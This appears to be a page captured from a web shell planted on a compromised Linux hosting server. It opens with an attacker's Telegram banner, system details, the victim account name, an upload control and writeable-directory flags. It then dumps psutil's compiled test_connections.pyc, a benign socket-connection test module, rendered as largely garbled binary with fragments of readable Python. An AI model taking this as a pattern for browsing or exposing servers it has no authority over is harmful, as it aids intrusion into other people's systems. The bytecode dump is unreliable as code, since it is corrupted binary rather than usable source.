https://t.me/AnonymousX5
Server : Apache
System : Linux cvar2.toservers.com 3.10.0-962.3.2.lve1.5.73.el7.x86_64 #1 SMP Wed Aug 24 21:31:23 UTC 2022 x86_64
User : njnconst ( 1116)
PHP Version : 8.4.18
Disable Function : NONE
Directory :  /usr/lib64/python2.7/site-packages/psutil/tests/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //usr/lib64/python2.7/site-packages/psutil/tests/test_connections.pyc
�
4��\c@sdZddlZddlZddlZddlmZddlmZddlmZddlmZddlm	Z	ddl
Z
ddl
mZdd	l
mZdd
l
m
Z
ddl
mZddl
mZdd
l
mZddl
mZddl
mZddlmZddlmZddlmZddlmZddlmZddlmZddlmZddlmZddlmZddlmZddlm Z ddlm!Z!ddlm"Z"ddlm#Z#ddlm$Z$ddlm%Z%dd lm&Z&dd!lm'Z'dd"lm(Z(dd#lm)Z)e
j*�Z+d$e,fd%��YZ-d&e-e&j.fd'��YZ/d(e-e&j.fd)��YZ0d*e-e&j.fd+��YZ1d,e&j.fd-��YZ2e3d.kr�dd/l4m5Z5e5e6�ndS(0s;Tests for net_connections() and Process.connections() APIs.i����N(tclosing(tAF_INET(tAF_INET6(t
SOCK_DGRAM(tSOCK_STREAM(tFREEBSD(tLINUX(tMACOS(tNETBSD(tOPENBSD(tPOSIX(tSUNOS(tWINDOWS(t
supports_ipv6(tPY3(tAF_UNIX(tbind_socket(tbind_unix_socket(tcheck_connection_ntuple(tcreate_sockets(t
get_free_port(tHAS_CONNECTIONS_UNIX(tpyrun(t
reap_children(tsafe_rmpath(tskip_on_access_denied(ttcp_socketpair(tTESTFN(tTRAVIS(tunittest(tunix_socket_path(tunix_socketpair(t
wait_for_filetBasecBs;eZd�Zd�Zd�Zdd�Zdd�ZRS(cCs<tt�ts8tjdd�}|s8t|��ndS(Ntkindtall(RRRtthisproctconnectionstAssertionError(tselftcons((sC/usr/lib64/python2.7/site-packages/psutil/tests/test_connections.pytsetUp6s
cCsCtt�t�ts?tjdd�}|s?t|��ndS(NR"R#(RRRRR$R%R&(R'R(((sC/usr/lib64/python2.7/site-packages/psutil/tests/test_connections.pyttearDown=s

cCs�tjdd�}tg|D]}|j|f^q�}trN||j�S|jt|�d�|djdkr�|j||j�j|j��n|dSdS(NR"R#iii����(R$R%tdicttfdRtfilenotassertEqualtlen(R'tsockR(tctsmap((sC/usr/lib64/python2.7/site-packages/psutil/tests/test_connections.pytget_conn_from_sockFs(&cCsP|dkr|j|�}nt|�|jdkrS|j|j|j��n|j|j|j�|j|j|jt	j
t	j��|j�}|r�t
r�t|t�r�|j�}n|jtkr�|d }n|jtkr�tr�n|j|j|�|jtkrLtrLtjdd�}|jtj�|�n|S(s�Given a socket, makes sure it matches the one obtained
        via psutil. It assumes this process created one connection
        only (the one supposed to be checked).
        i����iR"R#N(tNoneR3RR,R.R-tfamilyttypet
getsockopttsockett
SOL_SOCKETtSO_TYPEtgetsocknameRt
isinstancetbytestdecodeRRR	tladdrRR$R%tcompare_procsys_connectionstostgetpid(R'R0tconnR?R(((sC/usr/lib64/python2.7/site-packages/psutil/tests/test_connections.pytcheck_socketSs(

R#cCs�ytjd|�}Wn!tjk
r9tr3dS�nXg|D]}|j|krA|d ^qA}|j�|j�|j||�dS(s�Given a process PID and its list of connections compare
        those against system-wide connections retrieved via
        psutil.net_connections.
        R"Ni����(tpsutiltnet_connectionstAccessDeniedRtpidtsortR.(R'RHt	proc_consR"tsys_consR1((sC/usr/lib64/python2.7/site-packages/psutil/tests/test_connections.pyR@ws,

N(t__name__t
__module__R)R*R3R4RDR@(((sC/usr/lib64/python2.7/site-packages/psutil/tests/test_connections.pyR!4s
				
$tTestUnconnectedSocketscBs�eZdZd�Zeje�d�d��Zd�Zeje�d�d��Z	eje
d�d��Zeje
d�d��ZRS(	s;Tests sockets which are open but not connected to anything.cCsldt�f}ttttd|���<}|j|�}|jsLt�|j|j	t
j�WdQXdS(Ns	127.0.0.1taddr(RRRRRRDtraddrR&R.tstatusREtCONN_LISTEN(R'ROR0RC((sC/usr/lib64/python2.7/site-packages/psutil/tests/test_connections.pyttest_tcp_v4�s
sIPv6 not supportedcCsldt�f}ttttd|���<}|j|�}|jsLt�|j|j	t
j�WdQXdS(Ns::1RO(RRRRRRDRPR&R.RQRERR(R'ROR0RC((sC/usr/lib64/python2.7/site-packages/psutil/tests/test_connections.pyttest_tcp_v6�s
cCsldt�f}ttttd|���<}|j|�}|jsLt�|j|j	t
j�WdQXdS(Ns	127.0.0.1RO(RRRRRRDRPR&R.RQREt	CONN_NONE(R'ROR0RC((sC/usr/lib64/python2.7/site-packages/psutil/tests/test_connections.pyttest_udp_v4�s
cCsldt�f}ttttd|���<}|j|�}|jsLt�|j|j	t
j�WdQXdS(Ns::1RO(RRRRRRDRPR&R.RQRERU(R'ROR0RC((sC/usr/lib64/python2.7/site-packages/psutil/tests/test_connections.pyttest_udp_v6�s
s
POSIX onlycCslt��]}tt|dt���<}|j|�}|jsFt�|j|jt	j
�WdQXWdQXdS(NR6(RRRRRDRPR&R.RQRERU(R'tnameR0RC((sC/usr/lib64/python2.7/site-packages/psutil/tests/test_connections.pyt
test_unix_tcp�s
cCslt��]}tt|dt���<}|j|�}|jsFt�|j|jt	j
�WdQXWdQXdS(NR6(RRRRRDRPR&R.RQRERU(R'RXR0RC((sC/usr/lib64/python2.7/site-packages/psutil/tests/test_connections.pyt
test_unix_udp�s
(
RLRMt__doc__RSRtskipIfR
RTRVRWR
RYRZ(((sC/usr/lib64/python2.7/site-packages/psutil/tests/test_connections.pyRN�s		tTestConnectedSocketPairscBsfeZdZejed�d��Zejed�d��Ze	de
�d��Zd�ZRS(sJTest socket pairs which are are actually connected to
    each other.
    sunreliable on SUONScCs�dt�f}tjdd�s(t�ttd|�\}}z`tjdd�}|jt|�d�|j|djt	j
�|j|djt	j
�Wd|j�|j�XdS(Ns	127.0.0.1R"ttcp4ROiii(RR$R%R&RRR.R/RQREtCONN_ESTABLISHEDtclose(R'ROtservertclientR(((sC/usr/lib64/python2.7/site-packages/psutil/tests/test_connections.pyttest_tcp�s
s
POSIX onlyc
Cs�t���}t|�\}}z�tjdd�}|djoJ|djsTt�|djok|djsut�tr�g|D]}|jdkr�|^q�}n|jt	|�d�t
s�ts�tr#|j|djd�|j|djd�|j||djp|dj�n�t
rux�|dj|dj|dj|djfD]}|j|d�qXWnH|j|djp�|dj|�|j|djp�|dj|�Wd|j�|j�XWdQXdS(NR"tunixiis/var/run/logit(RRR$R%R?RPR&RR.R/RRRR	R`(R'RXRaRbR(R1RO((sC/usr/lib64/python2.7/site-packages/psutil/tests/test_connections.pyt	test_unix�s*!!+'$(
tonly_ifcs��fd�}tjd�}tjd�}ddlm}tjjt�}||�jdt	t
�ddd	|�}||�jdt	t
�ddd	|�}||�jdt	t�dd
d	|�}||�jdt	t�dd
d	|�}	t|�}
t
t|��}t|�}t
t|��}
t�r{t|�}t
t|��}t|	�}t
t|��}nd}d}d}d}x5tj�D]'}|j�}�jt|�d�x�|D]�}|j|
jkr|||t
t|dtjd�q�|j|jkrC|||t
t|
dtjd�q�|jt|dd�kr�|||tt|dtjd�q�|jt|dd�kr�|||tt|dtjd �q�q�Wq�W�jt|jdd�dS(!Nc
s�d}t|��j|j|��j|j|��j|j|��j|j|��j|j|�xN|D]F}	|jd|	�}
|	|kr�|
s�t�qv|
svt|
��qvWt	r��j
|j|g�ndS(
NR#tinettinet4tinet6ttcpR^ttcp6tudptudp4tudp6R"(
sallsinetsinet4sinet6stcpstcp4stcp6sudpsudp4sudp6(RR.R5R6R?RPRQR%R&RR@RH(tprocRCR5R6R?RPRQtkindst	all_kindsR"R((R'(sC/usr/lib64/python2.7/site-packages/psutil/tests/test_connections.pyt
check_conns

s
            import socket, time
            s = socket.socket($family, socket.SOCK_STREAM)
            s.bind(('$addr', 0))
            s.listen(1)
            with open('$testfn', 'w') as f:
                f.write(str(s.getsockname()[:2]))
            time.sleep(60)
        s�
            import socket, time
            s = socket.socket($family, socket.SOCK_DGRAM)
            s.bind(('$addr', 0))
            with open('$testfn', 'w') as f:
                f.write(str(s.getsockname()[:2]))
            time.sleep(60)
        i����(tTemplateR5ROs	127.0.0.1ttestfns::1iR#RhRiRkR^RmRnRHRjRlRoR"s???((sallsinetsinet4stcpstcp4((sallsinetsinet4sudpsudp4((sallsinetsinet6stcpstcp6((sallsinetsinet6sudpsudp6(ttextwraptdedenttstringRtRAtpathtbasenameRt
substitutetintRRRtevalR R
R4R$tchildrenR%R.R/RHRRERRRRUtgetattrtassertRaisest
ValueError(R'Rsttcp_templatetudp_templateRtttestfilet
tcp4_templatet
udp4_templatet
tcp6_templatet
udp6_templatet	tcp4_proct	tcp4_addrt	udp4_proct	udp4_addrt	tcp6_proct	tcp6_addrt	udp6_proct	udp6_addrtpR(RC((R'sC/usr/lib64/python2.7/site-packages/psutil/tests/test_connections.pyttest_combossb			



c	Cs�t���}tjdd�}|jt|�t|��tjdd�}|jt|�t�rjdnd�x:|D]2}|j|jtt	f�|j|j
t�qxWtjdd�}|jt|�d�|j|djt�|j|dj
t�t�rftjdd�}|jt|�d�|j|djt	�|j|dj
t�ntjdd	�}|jt|�t�r�dnd�x:|D]2}|j|jtt	f�|j|j
t�q�Wtjdd
�}|jt|�d�|j|djt�|j|dj
t�t�r�tjdd�}|jt|�d�|j|djt	�|j|dj
t�ntjdd�}|jt|�t�r�d
nd�x@|D]8}|j|jtt	f�|j|j
ttf�q�Wt�r}tjdd�}|jt|�d�x=|D]2}|j|jt	�|j|j
ttf�qDWnt
r�tjdd�}|jt|�d�x=|D]2}|j|jt�|j|j
ttf�q�WnWdQXdS(NR"R#RkiiR^iRlRmRnRoRhiRjRdi(RR$R%R.R/R
tassertInR5RRR6RRRR(R'tsocksR(RC((sC/usr/lib64/python2.7/site-packages/psutil/tests/test_connections.pyttest_multi_sockets_filteringfs`%
	%
	%
	
 
(
RLRMR[RR\RRcR
RfRRR�R�(((sC/usr/lib64/python2.7/site-packages/psutil/tests/test_connections.pyR]�s
!btTestSystemWideConnectionscBs\eZdZe�d��Ze�d��Ze�ejeoEe	d�d���Z
RS(sTests for net_connections().cs��fd�}t���ddlm}x�|j�D]r\}}|dkr[tr[q6n|\}}tj|�}�jt|�tt	|���||||�q6W�j
ttjdd�WdQXdS(Ncsxttdt��}x\|D]T}�j|j|d|�|j|krf�j|j|d|�nt|�qWdS(NRtmsg(RR8tobjectR�R5R6R(R(tfamiliesttypes_RRC(R'(sC/usr/lib64/python2.7/site-packages/psutil/tests/test_connections.pytcheck�s
i����(t	conn_tmapRdR"s???(Rtpsutil._commonR�titemsRRERFR.R/tsetR�R�(R'R�R�R"tgroupsR�R�R(((R'sC/usr/lib64/python2.7/site-packages/psutil/tests/test_connections.pyttest_it�s
"cCslt��]}gtjdd�D]!}|jtj�kr|^q}|jt|�t|��WdQXdS(NR"R#(RRERFRHRARBR.R/(R'R�txR(((sC/usr/lib64/python2.7/site-packages/psutil/tests/test_connections.pyttest_multi_socks�s!sunreliable on MACOS + TRAVISc
Cs|t��}t|�}WdQXg}d}xot|�D]a}tjjt�t|�}tj	d|�}t
|�}|j|j�|j
t|�q7Wx.t|�D] }tt|�}t|�q�Wgtjdd�D]}	|	j|kr�|	^q�}
xt|D]l}|jtg|
D]}	|	j|kr|	^q�|�tj|�}|jt|jd��|�qWdS(Ni
s                import time, os
                from psutil.tests import create_sockets
                with create_sockets():
                    with open(r'%s', 'w') as f:
                        f.write(str(os.getpid()))
                    time.sleep(60)
                R"R#(RR/trangeRARytrealpathRtstrRvRwRtappendRHt
addCleanupRR RERFR.tProcessR%(
R'R�texpectedtpidsttimestitfnametsrctsprocR�tsysconsRHR�((sC/usr/lib64/python2.7/site-packages/psutil/tests/test_connections.pyttest_multi_sockets_procs�s*


1(RLRMR[RR�R�RR\RRR�(((sC/usr/lib64/python2.7/site-packages/psutil/tests/test_connections.pyR��s
tTestMisccBseZd�ZRS(cCs�g}g}x�tt�D]�}|jd�rtt|�}t|�}|j�sat|��|jt|�|j||�|j|�|j|�qqWt	r�tj
tjntr�tj
ndS(NtCONN_(tdirREt
startswithRR�tisupperR&tassertNotInR�Rt	CONN_IDLEt
CONN_BOUNDRtCONN_DELETE_TCB(R'tintststrsRXtnumtstr_((sC/usr/lib64/python2.7/site-packages/psutil/tests/test_connections.pyttest_connection_constants�s 

(RLRMR�(((sC/usr/lib64/python2.7/site-packages/psutil/tests/test_connections.pyR��st__main__(trun(7R[RAR8Rvt
contextlibRRRRRRERRRRR	R
RRR�R
tpsutil._compatRtpsutil.testsRRRRRRRRRRRRRRRRRR R�R$R�R!tTestCaseRNR]R�R�RLtpsutil.tests.runnerR�t__file__(((sC/usr/lib64/python2.7/site-packages/psutil/tests/test_connections.pyt<module>s\]7�P

https://t.me/AnonymousX5 - 2025